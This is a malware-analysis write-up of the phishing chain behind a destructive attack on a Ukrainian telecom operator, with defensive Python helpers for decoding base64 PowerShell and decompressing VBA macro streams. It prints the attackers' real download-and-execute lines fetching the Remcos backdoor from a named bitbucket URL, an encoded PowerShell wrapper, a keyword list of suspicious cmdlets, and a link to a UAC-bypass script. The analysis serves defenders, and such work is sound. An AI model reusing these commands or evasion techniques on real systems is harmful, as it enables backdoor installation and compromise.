In mid-December, it was revealed that a devastating cyberattack hit Ukraine's biggest telecommunications company. The attack disabled the company's services for days (!), leaving over twenty million Ukrainians without mobile communication and internet access.
Ukrainian officials described the attack as having disastrous consequences, causing the complete destruction of the telecoms operator's core infrastructure. The attackers managed to wipe out nearly all data, including thousands of virtual servers and PCs.
Below, you can see the attack chain, which begins with receiving a phishing email containing a malicious .zip attachment with a .doc file inside.
email => attach1.zip => attach1.rar + attach2.rar => attach.rar (password protected) => .doc (vba) => SMB \\89_23_98_22\LN\GB.exe => powershell bitbucket_org/.../wsuscr.exe
The .doc file merely shows a picture that prompts the potential victim to enable editing and content - in other words, to lower security settings and permit the execution of a malicious macro.
To evade anti-malware checks on the email server and on the victim's system, the .doc file is packed into a multi-layered, password-protected archive. The document itself contains a VBA macro that initiates the infection process by executing the malware downloader.
Below you can see the detailed (trimmed for clarity) execution flow.
powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...')) | Invoke-Expression"
To evade detection, the PS script to be executed is base64 encoded. The batch file passes the encoded script to PowerShell, instructing it to decode it on-the-fly via the command line rather than saving the script to disk.
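A small triage helper for command lines of this shape, added here as example code (it is not part of the original analysis). It extracts the base64 literal passed to FromBase64String, decodes it as UTF-16LE (which is what Encoding.Unicode.GetString produces) and flags cmdlets worth a second look. It goes slightly beyond the page by also handling the equivalent -EncodedCommand / -enc form, which carries the same UTF-16LE base64. The sample script, the placeholder URL and file name are constructed for the example.

```python
"""Decode and triage base64-wrapped PowerShell command lines.
Example code for this write-up; the sample command line is constructed."""
import base64
import re

# Two common wrappers: FromBase64String('<b64>') inside a -Command string,
# and -EncodedCommand / -enc / -e <b64> given directly on the command line.
_FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings that warrant attention when they appear in a decoded script.
SUSPICIOUS = (
    "Invoke-Expression", "IEX", "Invoke-WebRequest", "wget", "DownloadString",
    "DownloadFile", "FromBase64String", "$env:APPDATA", "Start-Process",
)


def extract_payloads(cmdline):
    """Return every base64 blob wrapped in one of the known forms."""
    return _FROM_B64.findall(cmdline) + _ENC_FLAG.findall(cmdline)


def decode_unicode_b64(b64):
    """Decode as PowerShell does: base64, then UTF-16LE ("Unicode")."""
    raw = base64.b64decode(b64, validate=True)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Odd length or non-UTF-16 payload: show the bytes rather than fail.
        return raw.decode("latin-1")


def triage(cmdline):
    """Decode each embedded payload and list the indicators found in it."""
    findings = []
    for b64 in extract_payloads(cmdline):
        script = decode_unicode_b64(b64)
        hits = [s for s in SUSPICIOUS if s.lower() in script.lower()]
        findings.append({"script": script, "indicators": hits})
    return findings


def encode_unicode_b64(script):
    """Inverse of the decode step; used only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a downloader-style script behind the wrapper from the page.
SAMPLE_SCRIPT = (
    'wget "https://example.invalid/placeholder.exe" -OutFile "$env:APPDATA\\placeholder.exe"\r\n'
    'Invoke-Expression -Command "$env:APPDATA\\placeholder.exe"'
)
SAMPLE_CMDLINE = (
    'powershell -Command "[System.Text.Encoding]::Unicode.GetString('
    "[System.Convert]::FromBase64String('" + encode_unicode_b64(SAMPLE_SCRIPT)
    + "')) | Invoke-Expression\""
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINE):
        print("indicators:", finding["indicators"])
        print(finding["script"])
```

Feed it the full command line from process-creation telemetry (Sysmon event 1, or 4688 with command-line auditing enabled); the decoded script, not the opaque blob, is what the analyst and the detection rule should look at.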
Exploring the scripts
After decompressing the final RAR archive, the victim opens the malicious .doc file containing a malicious VBA macro. We can extract it using two tools: Frank Boldewin's OfficeMalScanner and Didier Stevens' oledump. Let's take a look at both.
> OfficeMalScanner.exe C:\Test\malicious.doc info
This command dumps the macros into the MALICIOUS.DOC-Macros folder. oledump relies on the olefile library, which we install with the "pip install olefile" command.
Next, dump the document structure.
oledump.py -s 9 --vbadecompressskipattributes C:\Test\malicious.doc >C:\Test\s9_malicious_doc.txt
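To show what that oledump step actually does to stream 9, here is a minimal decompressor for the MS-OVBA container format that VBA module streams use, together with the "skip attributes" filter. This is example code added for this write-up, not oledump's or OfficeMalScanner's own code. Both inputs are constructed: a literal-only container built by a helper, and a hand-assembled chunk that exercises the back-reference (CopyToken) path.

```python
"""Minimal MS-OVBA decompressor (the --vbadecompress step) plus the
'skip attributes' filter. Example code; sample inputs are constructed."""
import math
import struct

SIGNATURE_BYTE = 0x01      # first byte of every CompressedContainer
CHUNK_SIGNATURE = 0b011    # bits 12-14 of every CompressedChunkHeader


def _copytoken_help(difference):
    """Bit split of a CopyToken given how many bytes of the current chunk
    are already decompressed: the offset field grows, the length field shrinks."""
    bit_count = max(math.ceil(math.log2(difference)), 4)
    length_mask = 0xFFFF >> bit_count
    offset_mask = (~length_mask) & 0xFFFF
    return length_mask, offset_mask, bit_count


def vba_decompress(container):
    """Decompress one VBA module stream to its source bytes."""
    if not container or container[0] != SIGNATURE_BYTE:
        raise ValueError("not a VBA CompressedContainer")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header, = struct.unpack_from("<H", container, pos)
        if (header >> 12) & 0x07 != CHUNK_SIGNATURE:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_size = (header & 0x0FFF) + 3
        compressed = (header >> 15) & 1
        chunk_end = min(len(container), pos + chunk_size)
        chunk_start = len(out)          # decompressed offset where this chunk starts
        pos += 2
        if not compressed:
            out += container[pos:pos + 4096]   # uncompressed chunk: 4096 raw bytes
            pos += 4096
            continue
        while pos < chunk_end:
            flag_byte = container[pos]  # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if (flag_byte >> bit) & 1 == 0:
                    out.append(container[pos])          # LiteralToken
                    pos += 1
                else:                                   # CopyToken (back-reference)
                    token, = struct.unpack_from("<H", container, pos)
                    pos += 2
                    length_mask, offset_mask, bit_count = _copytoken_help(len(out) - chunk_start)
                    length = (token & length_mask) + 3
                    offset = ((token & offset_mask) >> (16 - bit_count)) + 1
                    src = len(out) - offset
                    for i in range(length):             # byte-wise: copies may overlap
                        out.append(out[src + i])
    return bytes(out)


def strip_attributes(source):
    """What --vbadecompressskipattributes does: drop the 'Attribute VB_...'
    lines Office adds to every module so only the real code remains."""
    return "".join(line for line in source.splitlines(keepends=True)
                   if not line.startswith("Attribute VB_"))


def build_literal_container(data):
    """Constructed test input: one compressed chunk made of LiteralTokens only
    (valid per the format, though Office would emit CopyTokens too)."""
    assert len(data) <= 3640, "single-chunk helper; keep the sample small"
    body = bytearray()
    for i in range(0, len(data), 8):
        body.append(0x00)              # flag byte 0: next (up to) 8 tokens are literals
        body += data[i:i + 8]
    header = (len(body) + 2 - 3) | (CHUNK_SIGNATURE << 12) | 0x8000
    return bytes([SIGNATURE_BYTE]) + struct.pack("<H", header) + bytes(body)


# Constructed module source, with the attribute line Office prepends.
MACRO_SOURCE = b'Attribute VB_Name = "Module1"\r\nSub Auto_Open()\r\nMsgBox "macro ran"\r\nEnd Sub\r\n'
# Hand-assembled chunk: six literals "ABCDEF", then a CopyToken (offset 6, length 4).
COPY_SAMPLE = bytes.fromhex("01 08b0 40 414243444546 0150")

if __name__ == "__main__":
    print(strip_attributes(vba_decompress(build_literal_container(MACRO_SOURCE)).decode()))
    print(vba_decompress(COPY_SAMPLE))
```

On a real document you would read the module stream with olefile (the container starts at the module's text offset inside the stream) and pass those bytes to vba_decompress; the constructed builder above exists only so the example runs without a sample file.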
This bat file copies another executable, test2.exe, from the share and executes an encoded PS script. The bypass commands within the script body are packed.
This execution chain ends with the launch of the Remcos dropper, wsuscr.exe, from the aforementioned PS script.
wget "https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe" -outfile "$env:APPDATA\wsuscr.exe"
Invoke-Expression -Command "$env:APPDATA\wsuscr.exe"
Remcos serves as a backdoor, granting attackers full access to the compromised system.
References
https://cert.gov.ua/article/6276824
https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1